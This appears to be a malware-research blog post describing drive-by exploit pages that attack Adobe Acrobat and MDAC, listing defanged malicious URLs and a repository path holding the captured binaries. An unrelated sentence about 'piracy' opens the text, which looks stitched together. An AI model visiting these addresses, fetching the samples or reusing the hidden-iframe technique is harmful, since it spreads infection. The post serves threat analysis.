Publishers often refer to prohibited copying as piracy. In this way, they imply that illegal copying is ethically equivalent to attacking ships on the high seas, kidnapping and murdering the people on them.
Once again, we have an Adobe exploit page injecting another piece of malware. This one is different than the one posted earlier and this one redirects through multiple pages logging each visitor. I was able to capture a video of the computer being exploited simply by visiting the page. As with the previous exploit, the binary installed is almost fully undetected except for a few heuristic catches. Look below for more information about this exploit and information about the binary. It can be downloaded from /pnuemo-malware/ in our repository.
BE ADVISED: All sites my be active. Proceed at your own risk.
The user will visit the following URL: hxxp://66.232.117.33/~catetc/tdsHAX/kotopoucykanety.php
This pages contains a simple hidden iframe that will load multiple pages logging each visitor how visits.
hxxp://82.103.138.10/ls/?t=24 is the page that exploits Adobe Acrobat and installs the malware. This page contains many, many pages of code and there is too much to post here. You can view or download a clean .txt of the page code for this exploit by clicking here.
We discovered another exploit page that will inject malware on to the users computer by way of a vulnerability in MDAC. The initial page is loaded with obfuscated code. When deobfuscated, it exploits Adobe and then opens the loader page in which the malware payload is injected. Below is analysis of the exploit page along with the malware information. The binary has very few real detections, most are just heuristics. This file is available in the repository under /pnuemo-malware/.
BE ADVISED: Websites may still be active, proceed at your own risk.
